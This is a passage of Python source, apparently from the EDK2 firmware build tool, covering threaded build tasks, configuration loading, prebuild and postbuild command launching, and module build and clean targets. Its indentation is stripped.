# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule and not Dep.BuildObject.CanSkipbyHash():
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
# Run hash operation post dependency, to account for libs
if GlobalData.gUseHashCache and self.BuildItem.BuildObject.IsLibrary:
HashFile = path.join(self.BuildItem.BuildObject.BuildDir, self.BuildItem.BuildObject.Name + ".hash")
SaveFileOnChange(HashFile, self.BuildItem.BuildObject.GenModuleHash(), True)
except:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
# Set the value used by hash invalidation flow in GlobalData.gModuleBuildTracking to 'SUCCESS'
# If Module or Lib is being tracked, it did not fail header check test, and built successfully
if (self.BuildItem.BuildObject.Arch in GlobalData.gModuleBuildTracking and
self.BuildItem.BuildObject in GlobalData.gModuleBuildTracking[self.BuildItem.BuildObject.Arch] and
GlobalData.gModuleBuildTracking[self.BuildItem.BuildObject.Arch][self.BuildItem.BuildObject] != 'FAIL_METAFILE' and
not BuildTask._ErrorFlag.isSet()
):
GlobalData.gModuleBuildTracking[self.BuildItem.BuildObject.Arch][self.BuildItem.BuildObject] = 'SUCCESS'
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size // 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
GlobalData.gDisableIncludePathCheck = BuildOptions.DisableIncludePathCheck
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if not os.path.exists(os.path.join(GlobalData.gConfDirectory, '.cache')):
os.makedirs(os.path.join(GlobalData.gConfDirectory, '.cache'))
self.Db = WorkspaceDatabase()
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
if "PYTHON3_ENABLE" in os.environ:
PYTHON3_ENABLE = os.environ["PYTHON3_ENABLE"]
if PYTHON3_ENABLE != "TRUE":
PYTHON3_ENABLE = "FALSE"
EdkLogger.quiet("%-16s = %s" % ("PYTHON3_ENABLE", PYTHON3_ENABLE))
if "PYTHON_COMMAND" in os.environ:
EdkLogger.quiet("%-16s = %s" % ("PYTHON_COMMAND", os.environ["PYTHON_COMMAND"]))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append(TAB_COMPILER_MSFT)
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber is None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
try:
self.ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db_Flag = True
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = [l.split("=", 1) for l in envs ]
envs = [[I.strip() for I in item] for item in envs if len(item) == 2]
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Error handling for hash feature
#
# On BuildTask error, iterate through the Module Build tracking
# dictionary to determine wheather a module failed to build. Invalidate
# the hash associated with that module by removing it from storage.
#
#
def invalidateHash(self):
# Only for hashing feature
if not GlobalData.gUseHashCache:
return
# GlobalData.gModuleBuildTracking contains only modules or libs that cannot be skipped by hash
for moduleAutoGenObjArch in GlobalData.gModuleBuildTracking.keys():
for moduleAutoGenObj in GlobalData.gModuleBuildTracking[moduleAutoGenObjArch].keys():
# Skip invalidating for Successful Module/Lib builds
if GlobalData.gModuleBuildTracking[moduleAutoGenObjArch][moduleAutoGenObj] == 'SUCCESS':
continue
# The module failed to build, failed to start building, or failed the header check test from this point on
# Remove .hash from build
ModuleHashFile = os.path.join(moduleAutoGenObj.BuildDir, moduleAutoGenObj.Name + ".hash")
if os.path.exists(ModuleHashFile):
os.remove(ModuleHashFile)
# Remove .hash file from cache
if GlobalData.gBinCacheDest:
FileDir = os.path.join(GlobalData.gBinCacheDest, moduleAutoGenObj.Arch, moduleAutoGenObj.SourceDir, moduleAutoGenObj.MetaFile.BaseName)
HashFile = os.path.join(FileDir, moduleAutoGenObj.Name + '.hash')
if os.path.exists(HashFile):
os.remove(HashFile)
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.UpdateBuildCache()
self.BuildModules = []
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.UpdateBuildCache()
self.BuildModules = []
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
